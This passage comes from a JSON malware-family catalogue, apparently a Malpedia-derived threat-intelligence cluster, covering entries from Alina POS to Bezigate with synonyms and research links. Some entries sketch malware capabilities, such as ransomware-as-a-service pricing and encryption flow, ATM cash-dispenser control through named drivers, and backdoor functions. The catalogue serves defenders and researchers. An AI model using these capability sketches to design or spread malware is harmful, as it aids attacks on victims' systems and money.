"https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/" ], "synonyms": [ "alina_eagle", "alina_spark", "katrina" ], "type": [] }, "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", "value": "Alina POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf", "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/" ], "synonyms": [ "Starman" ], "type": [] }, "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", "value": "Allaple" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] }, "uuid": "a0881a0c-e677-495b-b475-290af09bb716", "value": "Alma Communicator" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" ], "synonyms": [], "type": [] }, "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", "value": "AlmaLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" ], "synonyms": [], "type": [] }, "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", "value": "ALPC Local PrivEsc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", "https://twitter.com/JaromirHorejsi/status/813714602466877440" ], "synonyms": [], "type": [] }, "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", "value": "Alphabet Ransomware" }, { "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", "https://blog.cylance.com/an-introduction-to-alphalocker" ], "synonyms": [], "type": [] }, "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", "value": "AlphaLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", "value": "AlphaNC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [], "type": [] }, "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", "value": "Alreay" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html", "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html" ], "synonyms": [ "Olmarik", "Pihar", "TDL", "TDSS" ], "type": [] }, "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", "value": "Alureon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey", "https://twitter.com/0xffff0800/status/1062948406266642432", "https://twitter.com/ViriBack/status/1062405363457118210", "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/" ], "synonyms": [], "type": [] }, "uuid": "77f2c81f-be07-475a-8d77-f59b4847f696", "value": "Amadey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" ], "synonyms": [ "Adupihan" ], "type": [] }, "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", "value": "AMTsol" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom", "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/" ], "synonyms": [], "type": [] }, "uuid": "2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4", "value": "Anatova Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", "http://blog.morphisec.com/andromeda-tactics-analyzed", "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", "http://resources.infosecinstitute.com/andromeda-bot-analysis/", "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" ], "synonyms": [ "B106-Gamarue", "B67-SS-Gamarue", "Gamarue", "b66" ], "type": [] }, "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", "value": "Andromeda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" ], "synonyms": [], "type": [] }, "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", "value": "Anel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" ], "synonyms": [ "Latinus" ], "type": [] }, "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", "value": "Antilam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" ], "synonyms": [], "type": [] }, "uuid": "d3e16d46-e436-4757-b962-6fd393056415", "value": "Apocalipto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" ], "synonyms": [], "type": [] }, "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", "value": "Apocalypse" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" ], "synonyms": [], "type": [] }, "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", "value": "ArdaMax" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" ], "synonyms": [], "type": [] }, "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", "value": "Arefty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", "http://remote-keylogger.net/", "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/" ], "synonyms": [ "Aaron Keylogger" ], "type": [] }, "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", "value": "Arik Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer", "https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/" ], "synonyms": [], "type": [] }, "uuid": "59eff508-7f26-4fd8-b526-5772a9f3d9a6", "value": "Arkei Stealer" }, { "description": "ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which at the same time seems to be based on SafeLoader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", "https://twitter.com/Racco42/status/1001374490339790849", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" ], "synonyms": [], "type": [] }, "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", "value": "ARS VBS Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/" ], "synonyms": [], "type": [] }, "uuid": "05de9c50-5958-4d02-b1a0-c4a2367c2d22", "value": "Artra Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" ], "synonyms": [], "type": [] }, "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", "value": "AscentLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" ], "synonyms": [], "type": [] }, "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", "value": "ASPC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/", "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign", "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/" ], "synonyms": [ "Aseljo", "BadSrc" ], "type": [] }, "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", "value": "Asprox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", "http://blog.talosintel.com/2017/02/athena-go.html" ], "synonyms": [], "type": [] }, "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", "value": "AthenaGo RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" ], "synonyms": [], "type": [] }, "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", "value": "ATI-Agent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" ], "synonyms": [], "type": [] }, "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", "value": "ATMii" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" ], "synonyms": [], "type": [] }, "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", "value": "ATMitch" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", "value": "Atmosphere" }, { "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" ], "synonyms": [], "type": [] }, "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", "value": "ATMSpitter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene", "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html" ], "synonyms": [], "type": [] }, "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", "value": "August Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [ "Riodrv" ], "type": [] }, "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", "value": "Auriga" }, { "description": "Ransomware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/" ], "synonyms": [], "type": [] }, "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", "value": "Aurora" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" ], "synonyms": [], "type": [] }, "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", "value": "AvastDisabler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" ], "synonyms": [], "type": [] }, "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", "value": "AVCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" ], "synonyms": [], "type": [] }, "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", "value": "Aveo" }, { "description": "Information stealer which uses AutoIT for wrapping.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", "https://blog.yoroi.company/research/the-ave_maria-malware/" ], "synonyms": [ "AVE_MARIA" ], "type": [] }, "uuid": "6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25", "value": "Ave Maria" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" ], "synonyms": [], "type": [] }, "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", "value": "Avzhan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" ], "synonyms": [], "type": [] }, "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", "value": "Ayegent" }, { "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/" ], "synonyms": [ "PuffStealer", "Rultazo" ], "type": [] }, "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", "value": "Azorult" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", "http://www.spiegel.de/media/media-35683.pdf", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/" ], "synonyms": [ "SNOWBALL" ], "type": [] }, "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", "value": "Babar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat", "https://twitter.com/KorbenD_Intel/status/1110654679980085262" ], "synonyms": [], "type": [] }, "uuid": "1a196c09-f7cd-4a6e-bc3c-2489121b5381", "value": "BabyLon RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] }, "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", "value": "BABYMETAL" }, { "description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "934da8b2-f66e-4056-911e-1da09216e8b8", "value": "BACKBEND" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backnet", "https://github.com/valsov/BackNet" ], "synonyms": [], "type": [] }, "uuid": "e2840cc1-c43d-4542-9818-a3c15a0f9f7a", "value": "BackNet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", "value": "backspace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi", "https://www.cert.pl/en/news/single/backswap-malware-analysis/", "https://research.checkpoint.com/the-evolution-of-backswap/", "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/" ], "synonyms": [], "type": [] }, "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", "value": "BackSwap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", "https://twitter.com/PhysicalDrive0/status/833067081981710336" ], "synonyms": [], "type": [] }, "uuid": "af1c99be-e55a-473e-abed-726191e1da05", "value": "BadEncript" }, { "description": "BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://blog.amossys.fr/badflick-is-not-so-bad.html" ], "synonyms": [], "type": [] }, "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", "value": "badflick" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2" ], "synonyms": [], "type": [] }, "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", "value": "BadNews" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" ], "synonyms": [], "type": [] }, "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", "value": "Bagle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" ], "synonyms": [], "type": [] }, "uuid": "b420eb9f-d526-473c-95ab-5ab380bbec72", "value": "Bahamut (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldir", "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/", "https://www.youtube.com/watch?v=E2V4kB_gtcQ" ], "synonyms": [ "Baldr" ], "type": [] }, "uuid": "7024893a-96fe-4de4-bb04-c1d4794a4c95", "value": "Baldir" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" ], "synonyms": [], "type": [] }, "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", "value": "Banatrix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" ], "synonyms": [], "type": [] }, "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", "value": "bangat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", "http://blog.kleissner.org/?p=69", "http://osint.bambenekconsulting.com/feeds/", "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/", "http://blog.kleissner.org/?p=192" ], "synonyms": [ "BackPatcher", "BankPatch", "MultiBanker 2" ], "type": [] }, "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", "value": "Banjori" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" ], "synonyms": [], "type": [] }, "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", "value": "Bankshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" ], "synonyms": [], "type": [] }, "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", "value": "Bart" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" ], "synonyms": [], "type": [] }, "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", "value": "BatchWiper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" ], "synonyms": [], "type": [] }, "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", "value": "Batel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], "synonyms": [], "type": [] }, "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", "value": "BBSRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy", "https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china" ], "synonyms": [], "type": [] }, "uuid": "404e8121-bced-4320-a984-2b490fad90f8", "value": "Beapy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" ], "synonyms": [], "type": [] }, "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", "value": "Bedep" }, { "description": "BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim's desktop.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", "value": "beendoor" }, { "description": "Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard", "https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0" ], "synonyms": [], "type": [] }, "uuid": "40c48c99-7d33-4f35-92f1-937c3686afa7", "value": "Belonard" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.berbomthum", "https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/" ], "synonyms": [], "type": [] }, "uuid": "6944cbe7-db95-422d-8751-98c9fc4f0b12", "value": "Berbomthum" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", "https://securitykitten.github.io/2015/07/14/bernhardpos.html" ], "synonyms": [], "type": [] }, "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", "value": "BernhardPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt", "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", "http://www.xylibox.com/2015/04/betabot-retrospective.html", "https://asert.arbornetworks.com/beta-bot-a-code-review/", "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html" ], "synonyms": [ "Neurevt" ], "type": [] }, "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", "value": "BetaBot" }, { "description": "Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files. \r\n\r\nThe Trojan may perform the following actions: \r\nList, move, and delete drives\r\nList, move, and delete files\r\nList processes and running Windows titles\r\nList services\r\nList registry values\r\nKill processes\r\nMaximize, minimize, and close windows\r\nUpload and download 